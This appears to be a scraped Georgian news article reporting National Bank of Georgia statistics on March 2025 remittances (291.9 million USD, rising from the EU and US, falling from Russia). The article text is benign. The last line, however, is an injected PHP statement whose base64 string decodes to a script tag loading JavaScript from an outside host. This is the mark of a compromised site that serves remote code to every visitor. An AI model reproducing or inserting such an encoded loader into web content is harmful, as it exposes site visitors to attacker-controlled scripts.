gorgia
ავერსი jaluzi

2025 წლის მარტში ქვეყანაში შემოსული ფულადი გზავნილების მოცულობა, წინა წლის ანალოგიურ პერიოდთან შედარებით, 3.9%-ით გაიზარდა და 291.9 მილიონი აშშ დოლარი შეადგინა. ინფორმაციას ამის შესახებ ეროვნული ბანკი ავრცელებს.

სებ-ის მიერ გამოქვეყნებული სტატისტიკით ირკვევა, რომ ფულადი გზავნილების ზრდა მეტწილად აშშ-დან და ევროკავშირიდან ფულადი გზავნილების მატებამ განაპირობა. კერძოდ, ევროკავშირის ქვეყნებიდან ფულადი გზავნილების ნაკადების მოცულობამ 131.5 მლნ აშშ დოლარი შეადგინა, რაც 12.3%-ით აღემატება 2024 წლის მარტის ანალოგიურ მაჩვენებელს. გზავნილების მაქსიმალური წილი კვლავ ევროკავშირის ქვეყნებზე მოდის და 45.1%-ს შეადგენს. ევროკავშირის ქვეყნებიდან კვლავ აღსანიშნავია იტალიის, გერმანიისა და საბერძნეთის მაღალი წილი მთლიან ფულად გზავნილებში.

ამასთანავე, ზრდის ტენდენცია გრძელდება აშშ-დან გადმორიცხვების ნაწილშიც. კერძოდ, მარტში აშშ-დან გზავნილები წლიურად 21.7%-ით გაიზარდა და 55 მლნ აშშ დოლარი შეადგინა. რაც შეეხება რუსეთიდან ფულად გზავნილებს, კლების ტენდენცია გრძელდება – წლიურად 29.1%-ით შემცირდა და 37.8 მლნ აშშ დოლარი შეადგინა.

ცნობისთვის, 2025 წლის მარტში საქართველოდან საზღვარგარეთ 32.1 მლნ აშშ დოლარი (89.2 მლნ ლარი) გადაიგზავნა.

119
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");